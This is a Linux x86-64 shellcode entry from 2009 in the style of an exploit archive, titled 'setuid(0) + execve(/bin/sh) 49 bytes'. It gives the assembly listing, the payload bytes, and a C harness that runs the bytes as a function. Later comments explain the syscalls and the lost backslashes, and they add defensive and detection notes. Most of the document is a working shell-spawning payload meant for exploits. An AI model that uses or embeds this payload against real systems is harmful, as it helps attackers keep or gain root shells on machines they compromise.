
# Title : linux/x86-64 setuid(0) + execve(/bin/sh) 49 bytes
# Published : 2009-05-14
# Author : evil.xi4oyu


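/*
setuid(0) + execve(/bin/sh) - just 4 fun.
xi4oyu [at] 80sec.com

Note on this copy: the backslashes were lost in extraction, so each trailing
"nt" in the listing below stands for the escape sequence "\n\t" (the first line
ends in "%rdi", not "%rdint"). The three syscall numbers loaded into %al/%rax
are 0x69 (setuid), 0x3b (execve) and 0x3c (exit) on Linux x86-64.
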
main(){
__asm(  "xorq %rdi,%rdint"
        "mov $0x69,%alnt"
        "syscall nt"
        "xorq   %rdx, %rdx nt"
        "movq   $0x68732f6e69622fff,%rbx; nt"
        "shr    $0x8, %rbx; nt"
        "push   %rbx; nt"
        "movq   %rsp,%rdi; nt"
        "xorq   %rax,%rax; nt"
        "pushq  %rax; nt"
        "pushq  %rdi; nt"
        "movq   %rsp,%rsi; nt"
        "mov    $0x3b,%al; nt"
        "syscall ; nt"
        "pushq  $0x1 ; nt"
        "pop    %rdi ; nt"
        "pushq  $0x3c ; nt"
        "pop    %rax ; nt"
        "syscall  ; nt"
);
}
*/
/*
 * Test harness: stores the payload in a local array and calls the array as
 * if it were a function.
 *
 * Per the assembly listing in the comment above, the payload issues three
 * Linux x86-64 syscalls in order:
 *   1. 0x69 (setuid) with rdi = 0;
 *   2. 0x3b (execve) with rdi -> "/bin/sh", rsi -> { that pointer, NULL },
 *      rdx = 0;
 *   3. 0x3c (exit) with status 1, reached only if execve returns.
 *
 * NOTE(review): in this copy the string literal has lost its backslashes
 * ("x48x31..." rather than "\x48\x31..."), so as written the array holds
 * ASCII text and not the 49 machine-code bytes the title refers to.
 *
 * Defensive notes:
 *  - shellcode[] is a local (automatic) array, so the call below depends on
 *    the stack being mapped executable; with a non-executable stack the call
 *    is expected to fault instead of running the bytes.
 *  - The listing never checks the result of setuid. setuid(0) only succeeds
 *    for a process that already holds the privilege (for example a
 *    set-user-ID-root program), so the payload keeps or restores root in an
 *    already-privileged process; it is not a privilege escalation by itself.
 *  - For detection, the observable behaviour is a setuid(0) call followed
 *    directly by execve of /bin/sh from a process that does not normally
 *    start a shell; syscall auditing of setuid and execve covers both.
 */
main() {
        /* Payload bytes; declared inside main, so the array has automatic storage. */
        char shellcode[] =
        "x48x31xffxb0x69x0fx05x48x31xd2x48xbbxffx2fx62"
        "x69x6ex2fx73x68x48xc1xebx08x53x48x89xe7x48x31"
        "xc0x50x57x48x89xe6xb0x3bx0fx05x6ax01x5fx6ax3c"
        "x58x0fx05";
        /*
         * Cast the array to a pointer to a function returning void and call
         * it. ISO C does not define the conversion of an object pointer to a
         * function pointer; this relies on compiler and platform behaviour.
         */
        (*(void (*)()) shellcode)();
}
 
2009-05-14
evil.xi4oyu 
